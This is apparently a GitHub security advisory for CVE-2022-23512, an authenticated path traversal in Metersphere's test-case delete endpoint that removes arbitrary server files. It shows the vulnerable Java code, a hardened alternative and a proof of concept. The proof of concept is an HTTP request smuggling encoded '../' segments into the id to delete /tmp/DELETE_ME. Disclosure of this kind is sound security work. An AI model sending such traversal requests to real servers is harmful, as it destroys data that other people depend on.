
Path Injection in Metersphere leads to Arbitrary File Delete

Moderate
fit2-zhao published GHSA-5mwp-xw7p-5j27 Dec 9, 2022

Package

maven io.metersphere:metersphere (Maven)

Affected versions

< 2.4.1

Patched versions

2.4.1

Description

Summary

A Path Injection in ApiTestCaseService::deleteBodyFiles allows any authenticated user to delete arbitrary files on the server.

Details

Metersphere's ApiTestCaseController exposes a /delete/{id} endpoint that takes the user-controlled path variable id and passes it, unchanged, to ApiTestCaseService's delete method.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/controller/definition/ApiTestCaseController.java#L127
@GetMapping("/delete/{id}")
...
public void delete(@PathVariable String id) {
    apiTestCaseService.delete(id);
}

ApiTestCaseService's delete method passes that same id (now named testId) on to ApiTestCaseService's deleteBodyFiles.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L331
public void delete(String testId) {
    ...
    deleteBodyFiles(testId);
    ...
}

deleteBodyFiles concatenates the user-provided value (testId) into a filesystem path, new File(BODY_FILE_DIR + "/" + testId), without any validation; the resulting file or directory is emptied by FileUtil.deleteContents and then removed by file.delete(). Since testId may contain ../ segments, the path can resolve to any location outside BODY_FILE_DIR that the server process can delete.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L365
public void deleteBodyFiles(String testId) {
    File file = new File(BODY_FILE_DIR + "/" + testId);
    FileUtil.deleteContents(file);
    if (file.exists()) {
        file.delete();
    }
}
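As an added illustration (not Metersphere's code, and not a claim about what commit b5b4c51 changed), the following is a hardened counterpart of deleteBodyFiles: it accepts only ids that are a single safe path segment, re-checks that the resolved path stays inside the base directory, refuses to act on a symlinked directory, and deletes the tree without following links. The allow-list pattern and the temporary directory standing in for BODY_FILE_DIR are assumptions.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;
import java.util.Comparator;
import java.util.regex.Pattern;
import java.util.stream.Stream;

public class BodyFileDeleteHardened {
    // Allow-list for the id segment (assumption: ids are UUID-style, so no '/', '\' or '.').
    static final Pattern SAFE_ID = Pattern.compile("^[A-Za-z0-9_-]{1,64}$");
    // Returns base/testId only if testId is one safe segment that stays inside base.
    static Path resolveBodyDir(Path base, String testId) {
        if (testId == null || !SAFE_ID.matcher(testId).matches()) {
            throw new IllegalArgumentException("rejected test id: " + testId);
        }
        Path root = base.toAbsolutePath().normalize();
        Path target = root.resolve(testId).normalize();
        // Defence in depth: the allow-list already excludes "..", but re-check containment.
        if (target.equals(root) || !target.startsWith(root)) {
            throw new IllegalArgumentException("path escapes body file directory");
        }
        return target;
    }
    // Hardened counterpart of deleteBodyFiles: removes only the validated directory tree.
    static void deleteBodyFilesHardened(Path base, String testId) throws IOException {
        Path dir = resolveBodyDir(base, testId);
        // Only a real directory qualifies; a symlink planted at this path is left alone.
        if (!Files.isDirectory(dir, LinkOption.NOFOLLOW_LINKS)) return;
        // Files.walk does not follow symlinks unless FOLLOW_LINKS is given: links are deleted as links.
        try (Stream<Path> paths = Files.walk(dir)) {
            paths.sorted(Comparator.reverseOrder()).forEach(p -> {
                try { Files.delete(p); } catch (IOException e) { throw new UncheckedIOException(e); }
            });
        }
    }
    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("body");   // stands in for BODY_FILE_DIR
        Path outside = Files.createTempFile(base.getParent(), "DELETE_ME", "");
        Files.createDirectories(base.resolve("case-1"));
        deleteBodyFilesHardened(base, "case-1");          // legitimate id: directory removed
        try {
            deleteBodyFilesHardened(base, "../" + outside.getFileName());  // traversal shape
        } catch (IllegalArgumentException e) {
            System.out.println("blocked: " + e.getMessage());
        }
        System.out.println("case-1 removed: " + !Files.exists(base.resolve("case-1"))
                + ", outside file intact: " + Files.exists(outside));
    }
}
```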

Proof of Concept

  1. Log in with an account (can be non-administrator).
  2. Create a file that the PoC will delete:

docker exec -it $(docker ps -q --filter "name=ms-server") touch /tmp/DELETE_ME
docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE_ME

  3. Send the following request, replacing the SESSION cookie and CSRF-TOKEN header:

GET /api/testcase/delete/..%2F..%2F..%2F..%2Ftmp%2FDELETE_ME HTTP/1.1
Host: 127.0.0.1:8081
CSRF-TOKEN: <CSRF-TOKEN>
Cookie: SESSION=<SESSION-COOKIE>

  4. Verify that the file was deleted:

docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE_ME

Patches

The vulnerability has been fixed in v2.4.1.

  • b5b4c51: Arbitrary files can no longer be deleted.

Workarounds

It is recommended to upgrade the version to v2.4.1.

For more information

If you have any questions or comments about this advisory, please open an issue.

Severity

Moderate, 6.5 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: Low
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: None
Availability: High

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2022-23512

Credits